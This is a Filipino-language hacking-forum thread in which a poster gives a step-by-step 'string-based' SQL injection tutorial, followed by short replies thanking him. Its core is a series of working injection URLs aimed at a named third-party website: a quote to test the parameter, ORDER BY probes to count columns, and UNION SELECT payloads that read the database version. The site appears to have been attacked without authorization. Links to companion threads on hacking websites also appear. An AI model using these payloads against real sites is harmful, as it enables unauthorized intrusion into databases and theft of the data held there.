🔒 Closed -= string base sql injection =-

[mervinp]

-= STRiNG BaSe SQL InjecTion =-

NOTE:

Para lang ito sa may mga alam o marunong na sa UNION BASE SQL INJECTION...

Kung gusto niyong matutunan ang UNINION BASE SQLi visit kayo sa previous tutorial ko Click Here!!!

PARA SAAN ITONG STRING BASE SQL INJECTION?

Kapag may na encounter kang website na vulnerable naman siya sa SQL Injection...

Pero ng sinubukan mong ang command na "ORDER BY" no error or normal page pa rin ang lumalabas...


Ok, Let's start...

[ 1 ]

Target Site ko...

Code:

http://www.matrixinnovations.co.uk/products.php?id=6

Code

http://www.matrixinnovations.co.uk/products.php?id=6'

Ok vulnerable nga siya sa SQL Injection...

Kung titignan niyo sa larawan...


[ 2 ]

Ngayon dito na tayo gagamit ng "ORDER BY" para makuha kung ilang column... [alam niyo na ito hehehe]

Siguro naranasan na rin niyo...

Na kahit ilang beses na kayo nag-"ORDER BY" walang error pa rin ang lumalabs...

Parang ganito lang siya:

Code:

[/COLOR][/B][/B][/CENTER][/COLOR][/B][/B][/CENTER][/COLOR][/B][/B][/CENTER]
[B][B][COLOR=#000000]
[CENTER][B][B][COLOR=#000000]
[CENTER][B][B][COLOR=#000000]
[CENTER]
http://www.matrixinnovations.co.uk/products.php?id=6 ORDER BY 1--   [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=6 ORDER BY 20--   [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=6 ORDER BY 100--   [ NO ERROR PA RIN ]

Kahit nakaabot na ako sa "ORDER BY 100" no error o normal page pa rin...

Kaya ito ang sagot sa mga nai-istuck sa "ORDER BY" syntax...

Itong tinatawag natin na STRING BASE SQL INJECTION...



[ 3 ]


May gagawin lang tayong pagbabago sa syntax...

Ma-aadd lang ng apostrophe [ ' ] sa may hulian ng numero... [ products.php?id=6' ]

At maglalagay naman tayo ng plus sign [ + ] sa hulian ng null [ -- ]... [ products.php?id=6' ORDER BY 1--+ ]


Ganito na ang magyayari sa syntax natin:

Code

http://www.matrixinnovations.co.uk/products.php?id=6' ORDER BY 1--+

Itong query wala pa rin tayo nakikitang error....

Mas ok nga yan...

[ 4 ]

Ngayon, pareho pa rin na syntax ang gagamitin natin...

Pero tataas na yung number niya...

Tulad nito:

Code:

http://www.matrixinnovations.co.uk/products.php?id=6' ORDER BY 100--+

Sa wakas may error na rin tayong nakuha...

[ 5 ]

Kukunin na natin ang number ng column...

NOTE:

HUWAG KALIMUTAN ULET YUNG HYPEN [ - ] BETWEEN SA EQUAL SIGN [ = ] AT NUMERO... [ products.php?id=-6' ]

Code:

Code:[/COLOR][/SIZE][/CENTER][/COLOR][/SIZE][/CENTER]
[SIZE=4][COLOR=rgb(0, 0, 0)]
[CENTER][SIZE=4][COLOR=rgb(0, 0, 0)]
[CENTER]http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 1--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 2--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 3--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 4--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 5--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 6--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 7--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 8--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 9--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 10--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 11--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 12--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 13--+ [ NO ERROR ]
http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 14--+ [ ERROR! ]

Code:

http://www.matrixinnovations.co.uk/products.php?id=6' ORDER BY 13--+ [ NO ERROR ]

Code:

http://www.matrixinnovations.co.uk/products.php?id=-6' ORDER BY 14--+ [ ERROR! ]

[ 6 ]

Ngayon lahat ng Injection na mangyayaring...

Same lahat doon sa UNION BASE SQLi...

Huwag lang niyo kakalimutan o tatagaling itong [ ' ] at [ + ] sa query...

Ok sample ako, kung paano kunin ang yung vulnerable column with STRING BASE SQLi...


Ganito siya:

Code:

http://www.matrixinnovations.co.uk/products.php?id=-6' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+

[ 7 ]

Ganito naman sa SQL version:

Code:

http://www.matrixinnovations.co.uk/products.php?id=-6' UNION SELECT 1,@@VERSION,3,4,5,6,7,8,9,10,11,12,13--+

Ok, sa pagkuha ng mga DATABASE NAME's, TABLE NAME's etc...

Pareho lang sa UNION BASE...

Natapos na rin hehehe...


-= MY OTHER THREAD =-
https://phcorner.org/t/häçk-websites-via-union-based-sql-injection-beginners-guide.285937/

https://phcorner.org/t/faq-para-sa-mga-magsisimula-pa-lang-sa-web-hâckïng.286191/

 

[N1ghtmare]

Yun oh!

 

[mervinp]

Yun oh!

Sympre naman Kids XD

 

[hurricane01]

ano language po to gamit mo ts??

 

[Lednar11]

salamat dito paps

 

[N1ghtmare]

Sympre naman Kids XD

Yun mga makukulet na kids dati nakakatuwa isipin after a years, ngayon may Comp. Engineering Graduate na at yun isa paminsan minsan naman nakikita ko kumikita na online ng legal. lol

 

[Zainz]

up

 

[mervinp]

Yun mga makukulet na kids dati nakakatuwa isipin after a years, ngayon may Comp. Engineering Graduate na at yun isa paminsan minsan naman nakikita ko kumikita na online ng legal. lol

Haha!naging inspirasyon daw ako saka nila hehe!

 

[Aries]

Thanks po keep sharing!

 

[rosel2017]

Salamat po!

 

[Doofensmirtz]

ganito ang hinahanap Kong thread keep sharing paps.